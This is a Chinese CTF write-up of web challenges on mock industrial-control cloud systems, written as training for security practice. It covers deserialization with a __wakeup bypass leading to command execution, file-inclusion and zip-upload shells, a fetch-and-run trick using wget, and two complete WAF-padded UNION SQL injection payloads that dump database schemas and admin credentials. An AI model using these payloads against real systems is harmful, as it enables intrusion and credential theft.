为什么比赛要办在考试周。。
一些题是比赛完后做的,暂时只写了部分题的wp。
大量设备报表不见了(签道题)
题目
|
|
Solution
报表中心有链接,发现url为
不是sql注入,尝试爆破。当id=2333时:
|
|
工控系统的敏感消息遭泄漏
题目
|
|
Solution
存在git泄露,用githack下载源码进行审计。
index2.php中,有如下代码:
ereg
,可以用%00
绕过,然后再让--
出现在%00
的后面,即可进入第二个分支,进行反序列操作。在进行反序列化之前,进行了判断,不允许$secret
中出现./
在class.php中,定义了如下类:
|
|
在__destruct
阶段,进行了system操作,但在反序列化时__wakeup
方法的调用会设置file为wakeup.txt
,CVE-2016-7124中提到可以如果被反序列话的字符串其中对应的对象的属性个数发生变化时,会导致反序列化失败而同时使得__wakeup失效。因此可以绕过,也即file字段可控,且没有过滤。
由前分析,由于不允许出现./
,我们考虑先获得绝对路径。
在class.php中,将sleep
方法注释掉,在尾部添加
|
|
这样在执行时即执行:
pwd是为了获取当前路径,之后的是因为有一个.php
的后缀。得到;
修改为:
url编码后访问:
获得绝对路径为/var/www/html。
|
|
得到:
修改为:
url编码,访问:
flag如下:
工控管理系统新版本
题目
|
|
Solution
findpwd.php有注入漏洞
|
|
|
|
|
|
|
|
工控云管理系统设备维护中心被植入后门
题目
|
|
Solution
利用page参数和php伪协议读取源码
|
|
得到index.php源码,其中第121行:
这里存在后门,添加头部和对应GET字段。
发现一个目录s3chahahaDir,之后还有一个目录flag,里面有flag.php
|
|
得到flag:
工控云管理系统客服中心期待您的反馈
题目
|
|
Solution
有一个上传功能:
存在swn,swo,swp文件泄露:
但实际上只有swo,可以直接看到源码:view-source:http://47.104.188.226:20001/.index.php.swo
上面这个是index.php的源码,分析起来两个功能:
- autoload功能,这里提供了一个文件包含,但需要绕过许多限制,后面再说。
- download功能,提供了文件下载功能。
先利用download功能。在最下面,接受了两个参数admin
和file
。在download函数中,对admin
参数做了检测:
结合题目里有上传功能,我们访问:
从而获得了upload.php的源码:
接下来审计upload.php,可以看到允许上传zip文件,里面有这么一段代码:
调用了unzip.sh,访问http://47.104.188.226:20001/includes/unzip.sh ,得到代码:
sh脚本会将zip包解压缩到当前目录的uploaded目录下,接着删除符合规则的三种文件和目录。最后创建index.php,并设置权限位。
综上,我们构造一个压缩包,使之解压后不被删除,同时结合index.php的page参数的文件包含功能,即可获得shell。
文件chybeta内容:
压缩后为c.zip,在上传时抓包,将type改为application/zip。
上传成功后,会执行unzip.sh,即可解压出压缩包的内容,比如访问http://47.104.188.226:20001/includes/uploaded/chybeta
接着考虑如何包含uploaded目录下的chybeta文件。在index.php中,
由于这里是用$_SERVER['QUERY_STRING']
,并且用stripos来定位,所以当我们访问
$_SERVER['QUERY_STRING']
即为uploaded&page=uploaded/chybeta
,strpos的值为0,从而绕过了检测。
flag:
YUNWAF的突破_青云
题目
|
|
username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa’+UNION+ALL+SELECT+32,32,CONCAT((SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)),32#
result:
information_schema cetCCHqy004 mysql performance_schema
username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa’+UNION+ALL+SELECT+32,32,CONCAT((SELECT+GROUP_CONCAT(username,password,question,answer+SEPARATOR+0x3c62723e)+FROM+cetCCHqy004.admin)),32#
参与工控云管理系统警告记录的活动,可能奖励你一个flag
http://47.104.166.183:20008
相比于hitcon17的babyfirst,多了个waf.php,但不知道它的具体内容。
参考 HITCON CTF 2017-BabyFirst Revenge-writeup
用wget获取文件index.html,执行sh i*
即可执行sh index.html
:
flag:
工控云管理系统项目管理页面解析漏洞
题目
|
|
Solution
点进去后,点击项目管理,发现url为:
同时有一个view-source按钮,给了源码:
接下来这段代码:
参考 http://wonderkun.cc/index.html/?p=626
云工控管理系统文档中心的秘密
题目
|
|
Solution
YUNWAF的突破_华为云
题目
|
|
Solution
YUNWAF的突破_阿里
题目
|
|